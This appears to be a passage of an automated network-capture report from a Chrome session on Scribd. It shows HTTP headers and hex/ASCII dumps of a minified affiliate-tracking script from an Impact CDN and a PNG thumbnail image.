                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 73 22 3d 3d 3d 74 2e 61 63 74 69 6f 6e 7d 29 29 7c 7c 74 2e 65 76 65 6e 74 73 2e 70 75 73 68 28 61 29 7d 29 29 7d 69 66 28 30 3d 3d 3d 6e 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 66 3d 71 2e 70 61 67 65 3b 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 70 69 64 3d 3d 3d 66 26 26 28 48 3d 48 2e 63 6f 6e 63 61 74 28 74 2e 65 76 65 6e 74 73 29 29 7d 29 29 3b 76 61 72 20 6c 3d 6e 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 7b 70 69 78 65 6c 5f 69 64 3a 68 28 22 6b 65 79 22 29 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2c 7b 75 69 64 3a 71 2e 75 73 65 72 2c 74 69 6d 65 3a 73 28 29 2c 70 69 78 65 6c 5f 76 65 72 73 69 6f 6e 3a 22 22 2e 63 6f 6e 63 61 74 28
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: s"===t.action}))||t.events.push(a)}))}if(0===n.length)return!1;var f=q.page;n.forEach((function(t){t.pid===f&&(H=H.concat(t.events))}));var l=n.map((function(t){var n={pixel_id:h("key")};return Object.assign(t,{uid:q.user,time:s(),pixel_version:"".concat(
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 3d 6f 2e 63 61 6c 6c 28 72 2c 75 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 6f 3b 73 77 69 74 63 68 28 72 3d 30 2c 6f 26 26 28 75 3d 5b 32 26 75 5b 30 5d 2c 6f 2e 76 61 6c 75 65 5d 29 2c 75 5b 30 5d 29 7b 63 61 73 65 20 30 3a 63 61 73 65 20 31 3a 6f 3d 75 3b 62 72 65 61 6b 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 63 2e 6c 61 62 65 6c 2b 2b 2c 7b 76 61 6c 75 65 3a 75 5b 31 5d 2c 64 6f 6e 65 3a 21 31 7d 3b 63 61 73 65 20 35 3a 63 2e 6c 61 62 65 6c 2b 2b 2c 72 3d 75 5b 31 5d 2c 75 3d 5b 30 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 20 37 3a 75 3d 63 2e 6f 70 73 2e 70 6f 70 28 29 2c 63 2e 74 72 79 73 2e 70 6f 70 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 64 65 66 61 75 6c 74 3a 69 66 28 21 28 6f 3d 63 2e 74 72 79 73 2c 28 6f 3d 6f 2e 6c 65 6e 67 74
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: =o.call(r,u[1])).done)return o;switch(r=0,o&&(u=[2&u[0],o.value]),u[0]){case 0:case 1:o=u;break;case 4:return c.label++,{value:u[1],done:!1};case 5:c.label++,r=u[1],u=[0];continue;case 7:u=c.ops.pop(),c.trys.pop();continue;default:if(!(o=c.trys,(o=o.lengt


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        72192.168.2.164980935.186.249.724436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC555OUTGET /A3071581-5350-42cd-80be-79cdd173e0991.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: utt.impactcdn.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC900INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public,max-age=900,s-maxage=300
                                                                                                                                                                                                                                                                                                                                                                                        Expires: Fri, 06 Dec 2024 22:04:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Wed, 25 Sep 2024 15:36:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                        ETag: W/"3773b183e96099d1e7bb885c5297c6ae"
                                                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-generation: 1727278589342188
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-stored-content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-stored-content-length: 19233
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-hash: crc32c=PBtjng==
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-hash: md5=N3Oxg+lgmdHnu4hcUpfGrg==
                                                                                                                                                                                                                                                                                                                                                                                        x-goog-storage-class: MULTI_REGIONAL
                                                                                                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                                                                        X-GUploader-Response-Body-Transformations: gunzipped
                                                                                                                                                                                                                                                                                                                                                                                        Warning: 214 UploadServer gunzipped
                                                                                                                                                                                                                                                                                                                                                                                        X-GUploader-UploadID: AFiumC4cqD0SLbRsWvoN8ZxNO2KZ0JQ0CetcgjNPzDlZOO37Cr-JNH4kF8DAIuzbhNjXoRLC-vo
                                                                                                                                                                                                                                                                                                                                                                                        Server: UploadServer
                                                                                                                                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC490INData Raw: 35 32 62 0d 0a 2f 2a 21 20 40 62 75 69 6c 64 20 38 34 61 38 63 37 31 30 20 40 64 61 74 65 20 32 30 32 34 2d 30 39 2d 32 30 54 31 36 3a 35 39 3a 34 37 2e 36 30 36 5a 20 40 67 65 6e 65 72 61 74 65 64 20 32 30 32 34 2d 30 39 2d 32 35 54 31 35 3a 33 36 3a 32 39 2e 32 32 37 30 35 34 36 37 33 5a 20 2a 2f 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 72 3d 7b 38 37 31 34 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 76 61 72 20 61 3d 72 28 39 38 31 34 29 2c 66 3d 72 28 39 34 30 32 29 2c 64 3d 72 28 38 39 35 36 29 2c 6c 3d 72 28 34 32 36 29 2c 73 3d 72 28 35 34 32 33 29 2c 6d 3d 72 28 34 35 30 29 2e 74 2c 76 3d 72 28 31 35 33 37 29 2e 69 3b 6e 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 69 2c 63 29 7b 76 61
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 52b/*! @build 84a8c710 @date 2024-09-20T16:59:47.606Z @generated 2024-09-25T15:36:29.227054673Z */!function(){"use strict";var r={8714:function(n,t,r){var a=r(9814),f=r(9402),d=r(8956),l=r(426),s=r(5423),m=r(450).t,v=r(1537).i;n.exports=function(i,c){va
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC840INData Raw: 34 35 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 76 61 72 20 62 3d 72 28 39 33 34 30 29 2e 43 2c 68 3d 72 28 39 37 39 30 29 2c 78 3d 72 28 38 37 31 34 29 2c 79 3d 72 28 31 33 37 34 29 2c 77 3d 72 28 32 31 33 32 29 2c 67 3d 72 28 37 37 32 35 29 2c 24 3d 72 28 34 36 36 34 29 2c 43 3d 72 28 37 39 35 30 29 2e 46 2c 46 3d 72 28 31 35 33 37 29 2e 76 2c 6b 3d 72 28 37 37 38 38 29 2c 5a 3d 72 28 38 37 38 33 29 2c 7a 3d 72 28 37 30 36 32 29 2c 52 3d 72 28 34 35 30 29 2e 6b 2c 59 3d 72 28 38 35 34 36 29 3b 6e 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 2c 65 29 7b 76 61 72 20 69 2c 74 3d 52 28 24 2e 5a 28 43 28 59 29 29 2c 74 29 2c 63 3d 67 28 77 28 6e 2c 74 2c 62 29 2c 7b 64 65 62 75 67 3a 21 30 7d 29 2c 75 3d 7b 52 3a 21 31 7d 2c
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 45:function(n,t,r){var b=r(9340).C,h=r(9790),x=r(8714),y=r(1374),w=r(2132),g=r(7725),$=r(4664),C=r(7950).F,F=r(1537).v,k=r(7788),Z=r(8783),z=r(7062),R=r(450).k,Y=r(8546);n.exports=function(n,t,r,e){var i,t=R($.Z(C(Y)),t),c=g(w(n,t,b),{debug:!0}),u={R:!1},
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 38 30 30 30 0d 0a 31 5d 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 69 66 28 6d 29 72 65 74 75 72 6e 20 63 28 72 2c 68 2e 4b 29 2c 73 2e 70 75 73 68 28 5b 72 2c 6e 5d 29 3b 6d 3d 21 30 3b 76 61 72 20 65 3d 61 28 72 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 20 6c 28 72 2c 6e 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3b 65 28 6e 29 2c 6f 2e 4e 2e 56 28 72 2c 5b 21 21 6e 7c 7c 6e 75 6c 6c 5d 29 2c 6d 3d 21 31 2c 73 2e 6c 65 6e 67 74 68 26 26 28 74 3d 73 2e 73 68 69 66 74 28 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 28 74 5b 30 5d 2c 74 5b 31 5d 29 7d 2c 30 29 29 7d 29 7d 63 28 72 2c 68 2e 54 29 7d 2c 70 3d 30 2c 58 3d 64 2e 6c 65 6e 67 74 68 3b 70 3c 58 3b 2b 2b 70 29 63 28 64 5b 70 5d 2c 68 2e 44 29 2c 76 28 64
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 80001]);break;default:if(m)return c(r,h.K),s.push([r,n]);m=!0;var e=a(r);return void l(r,n,function(n){var t;e(n),o.N.V(r,[!!n||null]),m=!1,s.length&&(t=s.shift(),setTimeout(function(){v(t[0],t[1])},0))})}c(r,h.T)},p=0,X=d.length;p<X;++p)c(d[p],h.D),v(d
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 58 52 70 59 33 4e 38 58 46 77 75 59 57 31 68 65 6d 39 75 4c 57 46 6b 63 33 6c 7a 64 47 56 74 4b 56 78 63 4c 6d 4e 76 62 58 77 6f 5a 6d 46 32 5a 58 78 68 5a 48 52 79 4b 56 78 63 4c 6d 4e 76 66 43 68 30 59 31 78 63 4c 6e 52 79 59 57 52 6c 64 48 4a 68 59 32 74 6c 63 6e 78 68 62 6e 4a 6b 62 32 56 36 63 6e 4e 38 62 47 52 31 61 48 52 79 63 48 78 6b 63 47 4a 76 62 48 5a 33 66 48 46 72 63 33 4a 32 4b 56 78 63 4c 6d 35 6c 64 48 78 69 64 58 6c 63 58 43 35 6e 5a 57 35 70 58 46 77 75 64 58 4d 6b 49 69 77 69 65 6a 46 79 49 6a 6f 69 4b 47 64 76 58 46 77 75 57 32 45 74 65 6b 45 74 57 6a 41 74 4f 56 30 75 4b 6a 39 63 58 43 35 6a 62 32 30 6f 58 46 77 76 50 79 6c 63 58 44 39 70 5a 44 31 62 4d 43 30 35 58 53 34 72 50 31 68 62 4d 43 30 35 58 53 34 72 50 79 59 70 66 43 68 68
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: XRpY3N8XFwuYW1hem9uLWFkc3lzdGVtKVxcLmNvbXwoZmF2ZXxhZHRyKVxcLmNvfCh0Y1xcLnRyYWRldHJhY2tlcnxhbnJkb2V6cnN8bGR1aHRycHxkcGJvbHZ3fHFrc3J2KVxcLm5ldHxidXlcXC5nZW5pXFwudXMkIiwiejFyIjoiKGdvXFwuW2EtekEtWjAtOV0uKj9cXC5jb20oXFwvPylcXD9pZD1bMC05XS4rP1hbMC05XS4rPyYpfChh
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 75 4b 53 67 2f 50 53 34 71 58 46 78 69 59 32 46 74 63 47 6c 6b 50 56 74 63 58 47 51 72 58 53 6b 6f 50 7a 30 75 4b 6c 78 63 59 6d 31 77 63 6d 55 39 57 31 78 63 5a 43 74 64 4b 6c 78 63 59 69 6b 6f 50 7a 30 75 4b 6c 78 63 59 6e 42 31 59 6a 31 62 58 46 78 6b 4b 31 30 71 58 46 78 69 4b 56 78 63 55 79 6f 70 66 43 67 6f 5a 57 4a 68 65 56 78 63 4c 69 6c 63 58 46 4d 71 4b 47 31 72 59 32 6c 6b 4a 54 4e 45 4b 56 78 63 55 79 6f 6f 62 57 74 79 61 57 51 6c 4d 30 52 62 4d 43 30 35 58 46 77 74 58 53 6f 70 58 46 78 54 4b 69 67 6c 4d 6a 5a 6a 59 57 31 77 61 57 51 6c 4d 30 52 62 4d 43 30 35 58 53 6f 70 58 46 78 54 4b 69 6c 38 4b 43 68 7a 63 47 6c 75 5a 47 78 6c 62 57 46 30 64 48 4a 6c 63 33 4e 38 64 32 39 79 62 47 52 33 61 57 52 6c 59 33 6c 6a 62 47 56 79 65 58 78 30 61 47
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: uKSg/PS4qXFxiY2FtcGlkPVtcXGQrXSkoPz0uKlxcYm1wcmU9W1xcZCtdKlxcYikoPz0uKlxcYnB1Yj1bXFxkK10qXFxiKVxcUyopfCgoZWJheVxcLilcXFMqKG1rY2lkJTNEKVxcUyoobWtyaWQlM0RbMC05XFwtXSopXFxTKiglMjZjYW1waWQlM0RbMC05XSopXFxTKil8KChzcGluZGxlbWF0dHJlc3N8d29ybGR3aWRlY3ljbGVyeXx0aG
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 53 34 71 61 58 52 7a 59 32 63 39 4b 53 67 2f 50 53 34 71 61 58 52 7a 59 33 51 39 4b 53 34 71 66 43 67 6f 64 46 78 63 4c 6d 4e 6d 61 6e 56 74 63 46 78 63 4c 6d 4e 76 62 56 78 63 4c 79 6c 62 4d 43 30 35 58 53 70 63 58 43 39 30 58 46 77 76 57 7a 41 74 4f 56 30 71 4b 58 77 6f 61 47 39 33 62 46 78 63 4c 6d 31 6c 58 46 77 76 66 48 4e 6f 62 33 41 74 62 47 6c 75 61 33 4e 63 58 43 35 6a 62 31 78 63 4c 33 78 7a 61 47 39 77 4c 57 56 6b 61 58 52 7a 58 46 77 75 59 32 39 63 58 43 38 70 4b 43 68 63 58 47 52 37 4d 54 6c 39 4b 58 78 62 4d 43 30 35 59 53 31 36 51 53 31 61 58 58 73 78 4d 58 31 38 62 47 6c 75 61 79 6c 38 4b 48 4e 6a 63 6d 6c 77 64 48 4e 63 58 43 35 68 5a 6d 5a 70 62 47 6c 68 64 47 56 6d 64 58 52 31 63 6d 56 63 58 43 35 6a 62 32 31 63 58 43 39 42 52 6b 4e 73
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: S4qaXRzY2c9KSg/PS4qaXRzY3Q9KS4qfCgodFxcLmNmanVtcFxcLmNvbVxcLylbMC05XSpcXC90XFwvWzAtOV0qKXwoaG93bFxcLm1lXFwvfHNob3AtbGlua3NcXC5jb1xcL3xzaG9wLWVkaXRzXFwuY29cXC8pKChcXGR7MTl9KXxbMC05YS16QS1aXXsxMX18bGluayl8KHNjcmlwdHNcXC5hZmZpbGlhdGVmdXR1cmVcXC5jb21cXC9BRkNs
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 63 61 6e 63 65 6c 6c 65 64 22 2c 54 3a 22 63 6f 6d 70 6c 65 74 65 64 22 2c 42 3a 22 65 72 72 6f 72 65 64 22 2c 4b 3a 22 71 75 65 75 65 64 22 2c 47 3a 22 72 65 61 64 79 22 2c 57 3a 22 73 74 61 72 74 65 64 22 2c 4d 3a 22 77 61 72 6e 65 64 22 7d 7d 2c 39 33 34 30 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 65 78 70 6f 72 74 73 3d 7b 5f 3a 33 2c 6e 6e 3a 32 2c 74 6e 3a 31 2c 43 3a 30 2c 72 6e 3a 2d 31 7d 7d 2c 36 31 37 32 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 76 61 72 20 65 3d 72 28 35 30 31 36 29 2c 69 3d 72 28 31 35 33 37 29 2e 65 6e 2c 63 3d 72 28 32 38 32 39 29 2e 63 6e 3b 6e 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 29 7b 76 61 72 20 72 3d 65 2e 75 6e 28 65 2e 6f 6e 28 29 29 2e 69 6d 70 61 63 74 44 65 62 75 67 67 65 72
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: cancelled",T:"completed",B:"errored",K:"queued",G:"ready",W:"started",M:"warned"}},9340:function(n){n.exports={_:3,nn:2,tn:1,C:0,rn:-1}},6172:function(n,t,r){var e=r(5016),i=r(1537).en,c=r(2829).cn;n.exports=function(n,t){var r=e.un(e.on()).impactDebugger
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 28 74 2c 69 2e 57 2c 6e 7c 7c 7b 7d 29 2c 63 28 65 3f 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 5b 65 5d 28 74 2c 75 5b 28 6e 7c 7c 7b 7d 29 2e 7a 31 6d 5d 7c 7c 69 2e 54 2c 6e 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 72 5b 6e 2e 7a 31 6d 5d 28 74 2c 75 5b 6e 2e 7a 31 6d 5d 7c 7c 69 2e 54 2c 6e 29 3a 72 28 74 2c 69 2e 54 29 7d 29 7d 7d 7d 2c 31 34 36 30 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 2e 65 78 70 6f 72 74 73 3d 7b 5f 3a 22 64 65 62 75 67 22 2c 6e 6e 3a 22 69 6e 66 6f 22 2c 74 6e 3a 22 77 61 72 6e 22 2c 43 3a 22 65 72 72 6f 72 22 7d 7d 2c 32 36 31 34 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 76 61 72 20 69 3d 72 28 31 35 33 37 29 2e 4a 2c 63 3d 72 28 35 30 31 36 29 2c 75 3d 72 28 34 35 30 29 2e 6d 6e 3b 6e 2e 65 78 70 6f 72 74 73
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: (t,i.W,n||{}),c(e?function(n){r[e](t,u[(n||{}).z1m]||i.T,n)}:function(n){n?r[n.z1m](t,u[n.z1m]||i.T,n):r(t,i.T)})}}},1460:function(n){n.exports={_:"debug",nn:"info",tn:"warn",C:"error"}},2614:function(n,t,r){var i=r(1537).J,c=r(5016),u=r(450).mn;n.exports
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 2e 79 6e 28 75 2c 69 2c 66 2c 72 29 3b 21 73 2e 43 6e 2e 24 6e 28 29 26 26 74 2e 66 70 63 26 26 73 2e 43 6e 2e 46 6e 28 74 2e 66 70 63 29 2c 76 28 74 2e 74 70 73 29 2c 73 2e 6b 6e 28 29 26 26 6c 2e 4e 2e 5a 6e 28 58 2e 53 2c 5b 6f 2c 73 2e 43 6e 2e 52 6e 28 29 2c 73 2e 74 73 2c 61 2e 7a 6a 5d 29 2c 73 2e 59 6e 28 6f 2c 61 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 65 28 29 2c 72 28 6e 75 6c 6c 2c 74 29 7d 2c 30 29 7d 3b 69 66 28 6c 2e 59 2e 52 7c 7c 22 69 6d 61 67 65 22 3d 3d 3d 66 2e 74 61 67 7c 7c 22 69 66 72 61 6d 65 22 3d 3d 3d 66 2e 74 61 67 29 72 65 74 75 72 6e 20 73 2e 43 6e 2e 4e 6e 28 29 2c 63 28 21 30 29 3b 22 78 68 72 22 3d 3d 3d 66 2e 74 61 67 7c 7c 22 62 65 61 63 6f 6e 22 21 3d 3d 66 2e 74 61 67 26 26 28 66 2e 7a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .yn(u,i,f,r);!s.Cn.$n()&&t.fpc&&s.Cn.Fn(t.fpc),v(t.tps),s.kn()&&l.N.Zn(X.S,[o,s.Cn.Rn(),s.ts,a.zj]),s.Yn(o,a),setTimeout(function(){e(),r(null,t)},0)};if(l.Y.R||"image"===f.tag||"iframe"===f.tag)return s.Cn.Nn(),c(!0);"xhr"===f.tag||"beacon"!==f.tag&&(f.z
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1390INData Raw: 4f 66 28 6e 2e 63 68 61 72 41 74 28 63 2b 2b 29 29 3c 3c 31 38 7c 6f 2e 69 6e 64 65 78 4f 66 28 6e 2e 63 68 61 72 41 74 28 63 2b 2b 29 29 3c 3c 31 32 7c 28 72 3d 6f 2e 69 6e 64 65 78 4f 66 28 6e 2e 63 68 61 72 41 74 28 63 2b 2b 29 29 29 3c 3c 36 7c 28 65 3d 6f 2e 69 6e 64 65 78 4f 66 28 6e 2e 63 68 61 72 41 74 28 63 2b 2b 29 29 29 2c 69 2b 3d 36 34 3d 3d 3d 72 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 74 3e 3e 31 36 26 32 35 35 29 3a 36 34 3d 3d 3d 65 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 74 3e 3e 31 36 26 32 35 35 2c 74 3e 3e 38 26 32 35 35 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 74 3e 3e 31 36 26 32 35 35 2c 74 3e 3e 38 26 32 35 35 2c 32 35 35 26 74 29 3b 72 65 74 75 72 6e 20 69 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Of(n.charAt(c++))<<18|o.indexOf(n.charAt(c++))<<12|(r=o.indexOf(n.charAt(c++)))<<6|(e=o.indexOf(n.charAt(c++))),i+=64===r?String.fromCharCode(t>>16&255):64===e?String.fromCharCode(t>>16&255,t>>8&255):String.fromCharCode(t>>16&255,t>>8&255,255&t);return i}


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        73192.168.2.1649812151.101.130.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC411OUTGET /img/word_document/335808746/149x198/ec87a4c99b/1731725376?v=1 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: imgv2-2-f.scribdassets.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 13325
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=864000,stale-while-revalidate=86400,stale-if-error=86400
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 79
                                                                                                                                                                                                                                                                                                                                                                                        X-Scribd-Default-Image: false
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Age: 634507
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-chi-klot8100056-CHI, cache-ewr-kewr1740030-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 168, 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522375.782051,VS0,VE1
                                                                                                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:34 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 95 00 00 00 c6 08 03 00 00 00 ec 66 32 24 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 00 50 4c 54 45 ef f5 fb ed f5 ff 30 7c a3 eb f8 ff ef f5 fd ed f7 fb ed f7 fa 2e 7c a3 32 7c a3 f1 f5 f9 ed f7 fd ef f8 f9 ee f4 f9 f0 f8 f7 2e 7c a5 2c 7c a8 2c 7e a5 29 7f a5 f1 f5 fb ef f7 fb 33 7c a0 1a 36 5a f1 f5 fd ef f5 ff 30 7d a1 ed f8 ff ef f8 fd f1 f5 f7 2c 7c a0 ea f6 fd 33 7c 9d ed f5 fb e9 f8 ff f4 f6 f6 f0 f5 f9 2d 7e a3 f3 f3 fb 2f 7c a9 2e 7e a0 eb f7 fd 30 7b a0 35 7a a0 ec f9 f8 ea f8 fa f3 f6 fb f7 f4 fa 33 7a a7 1a 33 57 f5 f3 ff f4 f6 f9 32 7a a3 19 37 5e 1c 34 53 f1 f7 ff 32 7c 9f 34 7c 9a ef f8 f5 1b 34 5f e9 fa fd e7 fa fe eb f9 f7 eb f4
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: PNGIHDRf2$gAMAasRGBPLTE0|.|2|.|,|,~)3|6Z0},|3|-~/|.~0{5z3z3W2z7^4S2|4|4_
